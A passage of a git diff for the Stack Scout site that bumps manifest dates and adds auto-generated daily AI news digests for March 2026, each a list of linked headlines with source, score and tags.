mode 100644 data/digest-2026-04-10.md create mode 100644 data/digest-2026-04-11.md create mode 100644 data/digest-2026-04-12.md create mode 100644 data/digest-2026-04-14.md create mode 100644 data/digest-2026-04-15.md create mode 100644 data/digest-2026-04-16.md create mode 100644 data/digest-2026-04-17.md create mode 100644 data/digest-2026-04-18.md create mode 100644 data/digest-2026-04-19.md create mode 100644 data/digest-2026-04-20.md create mode 100644 data/digest-2026-04-21.md create mode 100644 data/digest-2026-04-22.md create mode 100644 data/digest-2026-04-23.md create mode 100644 data/digest-2026-04-25.md create mode 100644 data/digest-2026-04-26.md create mode 100644 data/digest-2026-04-27.md create mode 100644 data/digest-2026-04-28.md create mode 100644 data/digest-2026-04-29.md create mode 100644 data/digest-2026-04-30.md create mode 100644 data/digest-2026-05-01.md create mode 100644 data/digest-2026-05-02.md create mode 100644 data/digest-2026-05-03.md create mode 100644 data/digest-2026-05-04.md create mode 100644 data/digest-2026-05-05.md create mode 100644 data/digest-2026-05-06.md create mode 100644 data/digest-2026-05-07.md create mode 100644 data/digest-2026-05-08.md create mode 100644 data/digest-2026-05-09.md create mode 100644 data/digest-2026-05-10.md create mode 100644 data/digest-2026-05-11.md create mode 100644 data/digest-2026-05-12.md create mode 100644 data/digest-2026-05-13.md create mode 100644 data/digest-2026-05-14.md create mode 100644 data/digest-2026-05-15.md create mode 100644 data/digest-2026-05-16.md create mode 100644 data/digest-2026-05-17.md create mode 100644 data/digest-2026-05-18.md create mode 100644 data/digest-2026-05-19.md create mode 100644 data/digest-2026-05-20.md create mode 100644 data/digest-2026-05-21.md create mode 100644 data/digest-2026-05-22.md create mode 100644 data/digest-2026-05-23.md create mode 100644 data/digest-2026-05-24.md create mode 100644 data/digest-2026-05-25.md create mode 100644 data/digest-2026-05-26.md create mode 100644 data/digest-2026-05-27.md create mode 100644 data/digest-2026-05-28.md create mode 100644 data/digest-2026-05-29.md create mode 100644 data/digest-2026-05-30.md create mode 100644 data/digest-2026-05-31.md create mode 100644 data/digest-2026-06-01.md create mode 100644 data/digest-2026-06-02.md create mode 100644 data/digest-2026-06-03.md create mode 100644 data/digest-2026-06-04.md create mode 100644 data/digest-2026-06-05.md create mode 100644 data/digest-2026-06-06.md create mode 100644 data/news-feed-2026-03-15.json create mode 100644 data/news-feed-2026-03-16.json create mode 100644 data/news-feed-2026-03-17.json create mode 100644 data/news-feed-2026-03-18.json create mode 100644 data/news-feed-2026-03-19.json create mode 100644 data/news-feed-2026-03-20.json create mode 100644 data/news-feed-2026-03-21.json create mode 100644 data/news-feed-2026-03-22.json create mode 100644 data/news-feed-2026-03-23.json create mode 100644 data/news-feed-2026-03-24.json create mode 100644 data/news-feed-2026-03-25.json create mode 100644 data/news-feed-2026-03-26.json create mode 100644 data/news-feed-2026-03-27.json create mode 100644 data/news-feed-2026-03-28.json create mode 100644 data/news-feed-2026-03-29.json create mode 100644 data/news-feed-2026-03-30.json create mode 100644 data/news-feed-2026-03-31.json create mode 100644 data/news-feed-2026-04-01.json create mode 100644 data/news-feed-2026-04-02.json create mode 100644 data/news-feed-2026-04-03.json create mode 100644 data/news-feed-2026-04-04.json create mode 100644 data/news-feed-2026-04-05.json create mode 100644 data/news-feed-2026-04-06.json create mode 100644 data/news-feed-2026-04-07.json create mode 100644 data/news-feed-2026-04-08.json create mode 100644 data/news-feed-2026-04-09.json create mode 100644 data/news-feed-2026-04-10.json create mode 100644 data/news-feed-2026-04-11.json create mode 100644 data/news-feed-2026-04-12.json create mode 100644 data/news-feed-2026-04-14.json create mode 100644 data/news-feed-2026-04-15.json create mode 100644 data/news-feed-2026-04-16.json create mode 100644 data/news-feed-2026-04-17.json create mode 100644 data/news-feed-2026-04-18.json create mode 100644 data/news-feed-2026-04-19.json create mode 100644 data/news-feed-2026-04-20.json create mode 100644 data/news-feed-2026-04-21.json create mode 100644 data/news-feed-2026-04-22.json create mode 100644 data/news-feed-2026-04-23.json create mode 100644 data/news-feed-2026-04-25.json create mode 100644 data/news-feed-2026-04-26.json create mode 100644 data/news-feed-2026-04-27.json create mode 100644 data/news-feed-2026-04-28.json create mode 100644 data/news-feed-2026-04-29.json create mode 100644 data/news-feed-2026-04-30.json create mode 100644 data/news-feed-2026-05-01.json create mode 100644 data/news-feed-2026-05-02.json create mode 100644 data/news-feed-2026-05-03.json create mode 100644 data/news-feed-2026-05-04.json create mode 100644 data/news-feed-2026-05-05.json create mode 100644 data/news-feed-2026-05-06.json create mode 100644 data/news-feed-2026-05-07.json create mode 100644 data/news-feed-2026-05-08.json create mode 100644 data/news-feed-2026-05-09.json create mode 100644 data/news-feed-2026-05-10.json create mode 100644 data/news-feed-2026-05-11.json create mode 100644 data/news-feed-2026-05-12.json create mode 100644 data/news-feed-2026-05-13.json create mode 100644 data/news-feed-2026-05-14.json create mode 100644 data/news-feed-2026-05-15.json create mode 100644 data/news-feed-2026-05-16.json create mode 100644 data/news-feed-2026-05-17.json create mode 100644 data/news-feed-2026-05-18.json create mode 100644 data/news-feed-2026-05-19.json create mode 100644 data/news-feed-2026-05-20.json create mode 100644 data/news-feed-2026-05-21.json create mode 100644 data/news-feed-2026-05-22.json create mode 100644 data/news-feed-2026-05-23.json create mode 100644 data/news-feed-2026-05-24.json create mode 100644 data/news-feed-2026-05-25.json create mode 100644 data/news-feed-2026-05-26.json create mode 100644 data/news-feed-2026-05-27.json create mode 100644 data/news-feed-2026-05-28.json create mode 100644 data/news-feed-2026-05-29.json create mode 100644 data/news-feed-2026-05-30.json create mode 100644 data/news-feed-2026-05-31.json create mode 100644 data/news-feed-2026-06-01.json create mode 100644 data/news-feed-2026-06-02.json create mode 100644 data/news-feed-2026-06-03.json create mode 100644 data/news-feed-2026-06-04.json create mode 100644 data/news-feed-2026-06-05.json create mode 100644 data/news-feed-2026-06-06.json create mode 100644 data/news-feed-latest.json diff --git a/catalog/index.html b/catalog/index.html index 6afa345..7d20915 100644 --- a/catalog/index.html +++ b/catalog/index.html @@ -676,7 +676,7 @@

SyncPad

diff --git a/categories/apis/index.html b/categories/apis/index.html index 4175a4c..b12e7da 100644 --- a/categories/apis/index.html +++ b/categories/apis/index.html @@ -175,7 +175,7 @@

Anthropic API

diff --git a/categories/clis/index.html b/categories/clis/index.html index 81b6211..aaabad1 100644 --- a/categories/clis/index.html +++ b/categories/clis/index.html @@ -175,7 +175,7 @@

Wrangler

diff --git a/categories/desktop-apps/index.html b/categories/desktop-apps/index.html index c98a026..4df671e 100644 --- a/categories/desktop-apps/index.html +++ b/categories/desktop-apps/index.html @@ -141,7 +141,7 @@

SyncPad

diff --git a/categories/index.html b/categories/index.html index c9acbbd..64bb4cf 100644 --- a/categories/index.html +++ b/categories/index.html @@ -228,7 +228,7 @@

Desktop Apps

diff --git a/categories/mcps/index.html b/categories/mcps/index.html index f862d74..30e54c8 100644 --- a/categories/mcps/index.html +++ b/categories/mcps/index.html @@ -175,7 +175,7 @@

Playwright MCP

diff --git a/categories/web-apps/index.html b/categories/web-apps/index.html index cb3bc04..c35f706 100644 --- a/categories/web-apps/index.html +++ b/categories/web-apps/index.html @@ -209,7 +209,7 @@

Strudel Studio

diff --git a/categories/web-services/index.html b/categories/web-services/index.html index cf70f1a..15036a9 100644 --- a/categories/web-services/index.html +++ b/categories/web-services/index.html @@ -175,7 +175,7 @@

Make

diff --git a/categories/websites/index.html b/categories/websites/index.html index 999627d..1c17ed0 100644 --- a/categories/websites/index.html +++ b/categories/websites/index.html @@ -175,7 +175,7 @@

Hugging Face

diff --git a/collections/index.html b/collections/index.html index ae64571..c24ecb3 100644 --- a/collections/index.html +++ b/collections/index.html @@ -175,7 +175,7 @@

From the Stack Scout Lab

diff --git a/data/categories-manifest.json b/data/categories-manifest.json index 78826b4..0e2dc9c 100644 --- a/data/categories-manifest.json +++ b/data/categories-manifest.json @@ -1,7 +1,7 @@ { "title": "Stack Scout // Categories", - "generatedAt": "2026-06-04", - "updatedAt": "2026-06-04", + "generatedAt": "2026-06-06", + "updatedAt": "2026-06-06", "categories": [ { "slug": "websites", diff --git a/data/collections-manifest.json b/data/collections-manifest.json index c6f8013..871d976 100644 --- a/data/collections-manifest.json +++ b/data/collections-manifest.json @@ -1,7 +1,7 @@ { "title": "Stack Scout // Collections", - "generatedAt": "2026-06-04", - "updatedAt": "2026-06-04", + "generatedAt": "2026-06-06", + "updatedAt": "2026-06-06", "collections": [ { "slug": "creator-stack", diff --git a/data/digest-2026-03-15.md b/data/digest-2026-03-15.md new file mode 100644 index 0000000..0386265 --- /dev/null +++ b/data/digest-2026-03-15.md @@ -0,0 +1,23 @@ +# Stack Scout - AI News Digest +**2026-03-15** | 3 stories | Auto-generated from 55 archived stories + +--- + +## [Show HN: Open-source playground to red-team AI agents with exploits published](https://github.com/fabraix/playground) +*Hacker News* | 15/03/2026 | Score: 0.88 +Tags: open_source + +--- + +## [Chrome DevTools MCP (2025)](https://developer.chrome.com/blog/chrome-devtools-mcp-debug-your-browser-session) +*Hacker News* | 15/03/2026 | Score: 0.81 +Tags: mcp + +--- + +## [Office.eu launches as Europe's sovereign office platform](https://office.eu/media/pressrelease-20260304) +*Hacker News* | 15/03/2026 | Score: 0.76 +Tags: product_launch + +--- + diff --git a/data/digest-2026-03-16.md b/data/digest-2026-03-16.md new file mode 100644 index 0000000..3d9554c --- /dev/null +++ b/data/digest-2026-03-16.md @@ -0,0 +1,53 @@ +# Stack Scout - AI News Digest +**2026-03-16** | 8 stories | Auto-generated from 67 archived stories + +--- + +## [Apideck CLI – An AI-agent interface with much lower context consumption than MCP](https://www.apideck.com/blog/mcp-server-eating-context-window-cli-alternative) +*Hacker News* | 16/03/2026 | Score: 1.00 +Tags: mcp, cli_tool, agent_tool + +--- + +## [Speed at the cost of quality: Study of use of Cursor AI in open source projects](https://arxiv.org/abs/2511.04427) +*Hacker News* | 16/03/2026 | Score: 0.87 +Tags: open_source + +--- + +## [Nvidia Launches Vera CPU, Purpose-Built for Agentic AI](https://nvidianews.nvidia.com/news/nvidia-launches-vera-cpu-purpose-built-for-agentic-ai) +*Hacker News* | 16/03/2026 | Score: 0.84 +Tags: product_launch + +--- + +## [Nango (YC W23, API Access for Agents and Apps) Is Hiring](https://jobs.ashbyhq.com/Nango) +*Hacker News* | 16/03/2026 | Score: 0.82 +Tags: api_update + +--- + +## [SpiceCrypt: A Python library for decrypting LTspice encrypted model files](https://github.com/jtsylve/spice-crypt) +*Hacker News* | 15/03/2026 | Score: 0.76 +Tags: developer_tool + +--- + +## [Event Publisher enables event integration between Keycloak and OpenFGA](https://github.com/embesozzi/keycloak-openfga-event-publisher) +*Hacker News* | 16/03/2026 | Score: 0.70 +Tags: tool_update + +--- + +## [Lazycut: A simple terminal video trimmer using FFmpeg](https://github.com/emin-ozata/lazycut) +*Hacker News* | 16/03/2026 | Score: 0.70 +Tags: cli_tool + +--- + +## [Leanstral: Open-source agent for trustworthy coding and formal proof engineering](https://mistral.ai/news/leanstral) +*Hacker News* | 16/03/2026 | Score: 0.68 +Tags: open_source + +--- + diff --git a/data/digest-2026-03-17.md b/data/digest-2026-03-17.md new file mode 100644 index 0000000..8ea14b8 --- /dev/null +++ b/data/digest-2026-03-17.md @@ -0,0 +1,107 @@ +# Stack Scout - AI News Digest +**2026-03-17** | 15 stories | Auto-generated from 140 archived stories + +--- + +## [Show HN: Crust – A CLI framework for TypeScript and Bun](https://github.com/chenxin-yan/crust) +*Hacker News* | 17/03/2026 | Score: 0.84 +Tags: developer_tool, cli_tool + +--- + +## [World launches tool to verify humans behind AI shopping agents](https://techcrunch.com/2026/03/17/world-launches-tool-to-verify-humans-behind-ai-shopping-agents/) +*TechCrunch AI* | 17/03/2026 | Score: 1.00 +Tags: product_launch + +> As AI agents take the reins for online shoppers, Sam Altman's unconventional startup is looking to expand its verification offerings to support agentic commerce. + +--- + +## [Picsart now allows creators to ‘hire’ AI assistants through agent marketplace](https://techcrunch.com/2026/03/16/picsart-now-allows-creators-to-hire-ai-assistants-through-agent-marketplace/) +*TechCrunch AI* | 17/03/2026 | Score: 1.00 +Tags: agent_tool + +> Picsart's AI agent marketplace will launch with four agents, then add more agents each week. + +--- + +## [Nvidia’s version of OpenClaw could solve its biggest problem: security](https://techcrunch.com/2026/03/16/nvidias-version-of-openclaw-could-solve-its-biggest-problem-security/) +*TechCrunch AI* | 16/03/2026 | Score: 1.00 +Tags: agent_tool + +> Nvidia announced an open enterprise AI agent platform, called NemoClaw, that is built off of viral OpenClaw. + +--- + +## [How to watch Jensen Huang’s Nvidia GTC 2026 keynote — and what to expect](https://techcrunch.com/2026/03/16/nvidia-gtc-how-to-watch-jensen-huang-2026-keynote/) +*TechCrunch AI* | 16/03/2026 | Score: 1.00 +Tags: product_launch + +> GTC is Nvidia's flagship annual event, where the chipmaker typically announces new products, partnerships, and its vision for the future of computing. Huang's keynote will focus on Nvidia's role in the future of computing and AI. + +--- + +## [China’s OpenClaw Boom Is a Gold Rush for AI Companies](https://www.wired.com/story/china-is-going-all-in-on-openclaw/) +*Wired AI* | 13/03/2026 | Score: 0.91 +Tags: open_source + +> Hype around the open source agent is driving people to rent cloud servers and buy AI subscriptions just to try it, creating a windfall for tech companies. + +--- + +## [Mistral AI Releases Forge](https://mistral.ai/news/forge) +*Hacker News* | 17/03/2026 | Score: 0.79 +Tags: product_launch + +--- + +## [Show HN: Horizon – GPU-accelerated infinite-canvas terminal in Rust](https://github.com/peters/horizon) +*Hacker News* | 17/03/2026 | Score: 0.78 +Tags: cli_tool + +--- + +## [Chrome extension adjusts video speed based on how fast the speaker is talking](https://github.com/ywong137/speech-speed) +*Hacker News* | 13/03/2026 | Score: 0.78 +Tags: developer_tool + +--- + +## [Retraction: After a routine code rejection, an AI agent published a hit piece on someone by name](https://arstechnica.com/ai/2026/02/after-a-routine-code-rejection-an-ai-agent-published-a-hit-piece-on-someone-by-name/) +*Ars Technica AI* | 13/02/2026 | Score: 0.78 +Tags: agent_tool + +> This story has been retracted + +--- + +## [Node.js needs a virtual file system](https://blog.platformatic.dev/why-nodejs-needs-a-virtual-file-system) +*Hacker News* | 17/03/2026 | Score: 0.70 +Tags: cli_tool + +--- + +## [Kagi Translate now supports LinkedIn Speak as an output language](https://translate.kagi.com/?from=en&to=LinkedIn+speak) +*Hacker News* | 17/03/2026 | Score: 0.70 +Tags: tool_update + +--- + +## [Reverse-engineering Viktor and making it Open Source](https://matijacniacki.com/blog/openviktor) +*Hacker News* | 17/03/2026 | Score: 0.68 +Tags: open_source + +--- + +## [Building a Shell](https://healeycodes.com/building-a-shell) +*Hacker News* | 17/03/2026 | Score: 0.62 +Tags: cli_tool + +--- + +## [Show HN: Droeftoeter, a Terminal Coding Toy](https://github.com/whtspc/droeftoeter) +*Hacker News* | 13/03/2026 | Score: 0.62 +Tags: cli_tool + +--- + diff --git a/data/digest-2026-03-18.md b/data/digest-2026-03-18.md new file mode 100644 index 0000000..b931e5a --- /dev/null +++ b/data/digest-2026-03-18.md @@ -0,0 +1,71 @@ +# Stack Scout - AI News Digest +**2026-03-18** | 10 stories | Auto-generated from 90 archived stories + +--- + +## [The leaderboard “you can’t game,” funded by the companies it ranks](https://techcrunch.com/video/the-leaderboard-you-cant-game-funded-by-the-companies-it-ranks/) +*TechCrunch AI* | 18/03/2026 | Score: 1.00 +Tags: product_launch + +> Artificial intelligence models are multiplying fast, and competition is stiff. With so many players crowding the space, which one will be the best — and who decides that? Arena, formerly LM Arena, has emerged as the de facto public leaderboard for frontier LLMs, influencing funding, launches, and PR cycles. In just seven months, the startup went from a UC Berkeley PhD research […] + +--- + +## [The PhD students who became the judges of the AI industry](https://techcrunch.com/podcast/the-phd-students-who-became-the-judges-of-the-ai-industry/) +*TechCrunch AI* | 18/03/2026 | Score: 1.00 +Tags: product_launch + +> Artificial intelligence models are multiplying fast, and competition is stiff. With so many players crowding the space, which one will be the best — and who decides that? Arena, formerly LM Arena, has emerged as the de facto public leaderboard for frontier LLMs, influencing funding, launches, and PR cycles. In just seven months, the startup went from a UC Berkeley PhD research […] + +--- + +## [Meta is having trouble with rogue AI agents](https://techcrunch.com/2026/03/18/meta-is-having-trouble-with-rogue-ai-agents/) +*TechCrunch AI* | 18/03/2026 | Score: 0.99 +Tags: agent_tool + +> A rogue AI agent inadvertently exposed Meta company and user data to engineers who didn't have permission to see it. + +--- + +## [Launch an autonomous AI agent with sandboxed execution in 2 lines of code](https://amaiya.github.io/onprem/examples_agent.html) +*Hacker News* | 18/03/2026 | Score: 0.98 +Tags: agent_tool + +--- + +## [Nightingale – open-source karaoke app that works with any song on your computer](https://nightingale.cafe/) +*Hacker News* | 18/03/2026 | Score: 0.76 +Tags: open_source + +--- + +## [A ngrok-style secure tunnel server written in Rust and Open Source](https://github.com/joaoh82/rustunnel) +*Hacker News* | 18/03/2026 | Score: 0.71 +Tags: open_source + +--- + +## [Show HN: Tmux-IDE, OSS agent-first terminal IDE](https://tmux.thijsverreck.com) +*Hacker News* | 18/03/2026 | Score: 0.70 +Tags: cli_tool + +--- + +## [Show HN: Pgit – A Git-like CLI backed by PostgreSQL](https://oseifert.ch/blog/building-pgit) +*Hacker News* | 17/03/2026 | Score: 0.70 +Tags: cli_tool + +--- + +## [Show HN: Hacker News archive (47M+ items, 11.6GB) as Parquet, updated every 5m](https://huggingface.co/datasets/open-index/hacker-news) +*Hacker News* | 14/03/2026 | Score: 0.70 +Tags: tool_update + +--- + +## [Measuring progress toward AGI: A cognitive framework](https://blog.google/innovation-and-ai/models-and-research/google-deepmind/measuring-agi-cognitive-framework/) +*Hacker News* | 18/03/2026 | Score: 0.61 +Tags: developer_tool + +--- + diff --git a/data/digest-2026-03-19.md b/data/digest-2026-03-19.md new file mode 100644 index 0000000..4b8563a --- /dev/null +++ b/data/digest-2026-03-19.md @@ -0,0 +1,39 @@ +# Stack Scout - AI News Digest +**2026-03-19** | 5 stories | Auto-generated from 98 archived stories + +--- + +## [Multiverse Computing pushes its compressed AI models into the mainstream](https://techcrunch.com/2026/03/19/multiverse-computing-pushes-its-compressed-ai-models-into-the-mainstream/) +*TechCrunch AI* | 19/03/2026 | Score: 1.00 +Tags: api_update, tool_update + +> After compressing models from major AI labs, including OpenAI, Meta, DeepSeek, and Mistral AI, Multiverse Computing has launched both an app that showcases the capabilities of its compressed models and an API that makes them more widely available. + +--- + +## [DoorDash launches a new ‘Tasks’ app that pays couriers to submit videos to train AI](https://techcrunch.com/2026/03/19/doordash-launches-a-new-tasks-app-that-pays-couriers-to-submit-videos-to-train-ai/) +*TechCrunch AI* | 19/03/2026 | Score: 0.91 +Tags: product_launch + +> Delivery couriers will be able to earn money by completing activities like filming everyday tasks or recording themselves speaking in another language. + +--- + +## [Hyper-optimized reverse geocoding API](https://github.com/traccar/traccar-geocoder) +*Hacker News* | 19/03/2026 | Score: 0.76 +Tags: api_update + +--- + +## [Framework doesn't matter](https://cemrehancavdar.com/2026/02/19/your-framework-may-not-matter/) +*Hacker News* | 14/03/2026 | Score: 0.76 +Tags: developer_tool + +--- + +## [Cook: A simple CLI for orchestrating Claude Code](https://rjcorwin.github.io/cook/) +*Hacker News* | 19/03/2026 | Score: 0.65 +Tags: cli_tool + +--- + diff --git a/data/digest-2026-03-20.md b/data/digest-2026-03-20.md new file mode 100644 index 0000000..1330ddd --- /dev/null +++ b/data/digest-2026-03-20.md @@ -0,0 +1,45 @@ +# Stack Scout - AI News Digest +**2026-03-20** | 6 stories | Auto-generated from 82 archived stories + +--- + +## [OpenCode – Open source AI coding agent](https://opencode.ai/) +*Hacker News* | 20/03/2026 | Score: 0.76 +Tags: open_source, agent_tool + +--- + +## [My AI Agent ‘Cofounder’ Conquered LinkedIn. Then It Got Banned](https://www.wired.com/story/linkedin-invited-my-ai-cofounder-to-give-a-corporate-talk-then-banned-it/) +*Wired AI* | 20/03/2026 | Score: 1.00 +Tags: agent_tool + +> When social media is constantly pushing people to use AI, why not let AI agents participate? + +--- + +## [Trump’s AI framework targets state laws, shifts child safety burden to parents](https://techcrunch.com/2026/03/20/trumps-ai-framework-targets-state-laws-shifts-child-safety-burden-to-parents/) +*TechCrunch AI* | 20/03/2026 | Score: 0.91 +Tags: developer_tool + +> Trump’s AI framework pushes federal preemption of state laws, emphasizes innovation, and shifts responsibility for child safety toward parents while laying out lighter-touch rules for tech companies. + +--- + +## [Show HN: We built a terminal-only Bluesky / AT Proto client written in Fortran](https://github.com/FormerLab/fortransky) +*Hacker News* | 20/03/2026 | Score: 0.70 +Tags: cli_tool + +--- + +## [Show HN: Sonar – A tiny CLI to see and kill whatever's running on localhost](https://github.com/RasKrebs/sonar) +*Hacker News* | 20/03/2026 | Score: 0.70 +Tags: cli_tool + +--- + +## [Show HN: An open-source safety net for home hemodialysis](https://safehemo.com/) +*Hacker News* | 17/03/2026 | Score: 0.68 +Tags: open_source + +--- + diff --git a/data/digest-2026-03-21.md b/data/digest-2026-03-21.md new file mode 100644 index 0000000..3e8826b --- /dev/null +++ b/data/digest-2026-03-21.md @@ -0,0 +1,49 @@ +# Stack Scout - AI News Digest +**2026-03-21** | 7 stories | Auto-generated from 80 archived stories + +--- + +## [Apple Announces New Mac Sales Record Following MacBook Neo Launch](https://www.macrumors.com/2026/03/20/apple-shares-mac-sales-achievement/) +*Hacker News* | 21/03/2026 | Score: 0.90 +Tags: product_launch + +--- + +## [Mamba-3](https://www.together.ai/blog/mamba-3) +*Hacker News* | 17/03/2026 | Score: 0.87 +Tags: open_source + +> Meet Mamba-3: the SSM built for inference. Faster than Transformers at decode, stronger than Mamba-2, and open-source from day one. + +--- + +## [Iran launched unsuccessful attack on UK's Diego Garcia](https://www.bbc.com/news/articles/c5yljdgwppzo) +*Hacker News* | 21/03/2026 | Score: 0.84 +Tags: tool_update + +--- + +## [Show HN: Termcraft – terminal-first 2D sandbox survival in Rust](https://github.com/pagel-s/termcraft) +*Hacker News* | 21/03/2026 | Score: 0.70 +Tags: cli_tool + +--- + +## [Atuin v18.13 – better search, a PTY proxy, and AI for your shell](https://blog.atuin.sh/atuin-v18-13/) +*Hacker News* | 21/03/2026 | Score: 0.70 +Tags: cli_tool + +--- + +## [purl: a curl-esque CLI for making HTTP requests that require payment](https://www.purl.dev/) +*Hacker News* | 21/03/2026 | Score: 0.70 +Tags: cli_tool + +--- + +## [Floci – A free, open-source local AWS emulator](https://github.com/hectorvent/floci) +*Hacker News* | 21/03/2026 | Score: 0.68 +Tags: open_source + +--- + diff --git a/data/digest-2026-03-22.md b/data/digest-2026-03-22.md new file mode 100644 index 0000000..c0ab7c7 --- /dev/null +++ b/data/digest-2026-03-22.md @@ -0,0 +1,49 @@ +# Stack Scout - AI News Digest +**2026-03-22** | 7 stories | Auto-generated from 88 archived stories + +--- + +## [Elon Musk unveils chip manufacturing plans for SpaceX and Tesla](https://techcrunch.com/2026/03/22/elon-musk-unveils-chip-manufacturing-plans-for-spacex-and-tesla/) +*TechCrunch AI* | 22/03/2026 | Score: 1.00 +Tags: product_launch + +> Elon Musk recently outlined ambitious plans for a chip-building collaboration Tesla and SpaceX — but he has a history of overpromising. + +--- + +## [Show HN: A Markdown file that turns your AI agent into an autonomous researcher](https://github.com/krzysztofdudek/ResearcherSkill) +*Hacker News* | 22/03/2026 | Score: 0.92 +Tags: agent_tool + +--- + +## [HopTab–free,open source macOS app switcher and tiler that replaces Cmd+Tab](https://www.royalbhati.com/hoptab) +*Hacker News* | 22/03/2026 | Score: 0.76 +Tags: open_source + +--- + +## [Training Center for Maneuvering on Manned Model Ships](https://www.portrevel.com/) +*Hacker News* | 20/03/2026 | Score: 0.76 +Tags: tool_update + +--- + +## [$ teebot.dev – from terminal to tee in 6 seconds](https://teebot.dev) +*Hacker News* | 22/03/2026 | Score: 0.70 +Tags: cli_tool + +--- + +## [How to Attract AI Bots to Your Open Source Project](https://nesbitt.io/2026/03/21/how-to-attract-ai-bots-to-your-open-source-project.html) +*Hacker News* | 21/03/2026 | Score: 0.68 +Tags: open_source + +--- + +## [Node.js worker threads are problematic, but they work great for us](https://www.inngest.com/blog/node-worker-threads) +*Hacker News* | 18/03/2026 | Score: 0.62 +Tags: cli_tool + +--- + diff --git a/data/digest-2026-03-23.md b/data/digest-2026-03-23.md new file mode 100644 index 0000000..cf1d945 --- /dev/null +++ b/data/digest-2026-03-23.md @@ -0,0 +1,25 @@ +# Stack Scout - AI News Digest +**2026-03-23** | 3 stories | Auto-generated from 82 archived stories + +--- + +## [The Download: animal welfare gets AGI-pilled, and the White House unveils its AI policy](https://www.technologyreview.com/2026/03/23/1134509/the-download-animal-welfare-agi-pilled-white-house-unveils-ai-policy/) +*MIT Tech Review AI* | 23/03/2026 | Score: 0.88 +Tags: product_launch + +> This is today’s edition of The Download, our weekday newsletter that provides a daily dose of what’s going on in the world of technology. The Bay Area’s animal welfare movement wants to recruit AI  In early February, animal welfare advocates and AI researchers arrived in stocking feet at Mox, a scrappy, shoes-free coworking space in… + +--- + +## [Show HN: Agent Kernel – Three Markdown files that make any AI agent stateful](https://github.com/oguzbilgic/agent-kernel) +*Hacker News* | 23/03/2026 | Score: 0.78 +Tags: agent_tool + +--- + +## [The way CTRL-C in Postgres CLI cancels queries is incredibly hack-y](https://neon.com/blog/ctrl-c-in-psql-gives-me-the-heebie-jeebies) +*Hacker News* | 20/03/2026 | Score: 0.70 +Tags: cli_tool + +--- + diff --git a/data/digest-2026-03-24.md b/data/digest-2026-03-24.md new file mode 100644 index 0000000..5f3535c --- /dev/null +++ b/data/digest-2026-03-24.md @@ -0,0 +1,65 @@ +# Stack Scout - AI News Digest +**2026-03-24** | 9 stories | Auto-generated from 101 archived stories + +--- + +## [Google TV’s new Gemini features keep fans updated on sports teams and more](https://techcrunch.com/2026/03/24/google-tv-new-gemini-features-keep-fans-updated-on-sports-teams-deep-dives-visual-answers/) +*TechCrunch AI* | 24/03/2026 | Score: 1.00 +Tags: tool_update + +> Three Gemini-powered features are coming to your Google TV. This includes visual responses, deep dives, and sports briefs. + +--- + +## [OpenAI adds open source tools to help developers build for teen safety](https://techcrunch.com/2026/03/24/openai-adds-open-source-tools-to-help-developers-build-for-teen-safety/) +*TechCrunch AI* | 24/03/2026 | Score: 0.94 +Tags: open_source + +> Rather than working from scratch to figure out how to make AI safer for teens, developers can use these policies to fortify what they build. + +--- + +## [Sunsetting the Techempower Framework Benchmarks](https://github.com/TechEmpower/FrameworkBenchmarks/issues/10932) +*Hacker News* | 24/03/2026 | Score: 0.82 +Tags: developer_tool + +--- + +## [Self-propagating malware poisons open source software and wipes Iran-based machines](https://arstechnica.com/security/2026/03/self-propagating-malware-poisons-open-source-software-and-wipes-iran-based-machines/) +*Ars Technica AI* | 24/03/2026 | Score: 0.76 +Tags: open_source + +> Development houses: It's time to check your networks for infections. + +--- + +## [Qite.js – Frontend framework for people who hate React and love HTML](https://qitejs.qount25.dev) +*Hacker News* | 19/03/2026 | Score: 0.76 +Tags: developer_tool + +--- + +## [Nanobrew: The fastest macOS package manager compatible with brew](https://nanobrew.trilok.ai/) +*Hacker News* | 24/03/2026 | Score: 0.70 +Tags: developer_tool + +--- + +## [A retro terminal music player inspired by Winamp](https://github.com/bjarneo/cliamp) +*Hacker News* | 23/03/2026 | Score: 0.70 +Tags: cli_tool + +--- + +## [Show HN: Gridland: make terminal apps that also run in the browser](https://www.gridland.io/) +*Hacker News* | 24/03/2026 | Score: 0.62 +Tags: cli_tool + +--- + +## [Log File Viewer for the Terminal](https://lnav.org/) +*Hacker News* | 24/03/2026 | Score: 0.62 +Tags: cli_tool + +--- + diff --git a/data/digest-2026-03-25.md b/data/digest-2026-03-25.md new file mode 100644 index 0000000..e80cc8d --- /dev/null +++ b/data/digest-2026-03-25.md @@ -0,0 +1,53 @@ +# Stack Scout - AI News Digest +**2026-03-25** | 7 stories | Auto-generated from 95 archived stories + +--- + +## [Google launches Lyria 3 Pro music generation model](https://techcrunch.com/2026/03/25/google-launches-lyria-3-pro-music-generation-model/) +*TechCrunch AI* | 25/03/2026 | Score: 1.00 +Tags: product_launch + +> Google is launching Lyria 3 Pro, an upgraded music model that generates longer, more customizable tracks, as it expands AI music tools across Gemini, enterprise products, and other services. + +--- + +## [Meta launches new initiative to support entrepreneurship, drive AI adoption](https://techcrunch.com/2026/03/25/meta-launches-new-initiative-to-support-entrepreneurship-drive-ai-adoption/) +*TechCrunch AI* | 25/03/2026 | Score: 1.00 +Tags: product_launch + +> Meta CEO Mark Zuckerberg said in a memo to staff that small businesses have always been a big part of the company's business model, and that while tens of millions of entrepreneurs already use its platforms to grow and connect with customers, the company wants to do more in the space. + +--- + +## [Google unveils TurboQuant, a new AI memory compression algorithm — and yes, the internet is calling it ‘Pied Piper’](https://techcrunch.com/2026/03/25/google-turboquant-ai-memory-compression-silicon-valley-pied-piper/) +*TechCrunch AI* | 25/03/2026 | Score: 0.77 +Tags: product_launch + +> Google’s TurboQuant has the internet joking about Pied Piper from HBO's "Silicon Valley." The compression algorithm promises to shrink AI’s “working memory” by up to 6x, but it’s still just a lab experiment for now. + +--- + +## [Building a coding agent in Swift from scratch](https://github.com/ivan-magda/swift-claude-code) +*Hacker News* | 25/03/2026 | Score: 0.70 +Tags: agent_tool + +--- + +## [Show HN: DuckDB community extension for prefiltered HNSW using ACORN-1](https://github.com/cigrainger/duckdb-hnsw-acorn) +*Hacker News* | 25/03/2026 | Score: 0.70 +Tags: developer_tool + +--- + +## [Rendering complex scripts in terminal and OSC 66](https://thottingal.in/blog/2026/03/22/complex-scripts-in-terminal/) +*Hacker News* | 22/03/2026 | Score: 0.70 +Tags: cli_tool + +--- + +## [Open source isn't a tip jar – it's time to charge for access](https://www.theregister.com/2026/03/25/open_source_bill_opinion/) +*Hacker News* | 25/03/2026 | Score: 0.68 +Tags: open_source + +--- + diff --git 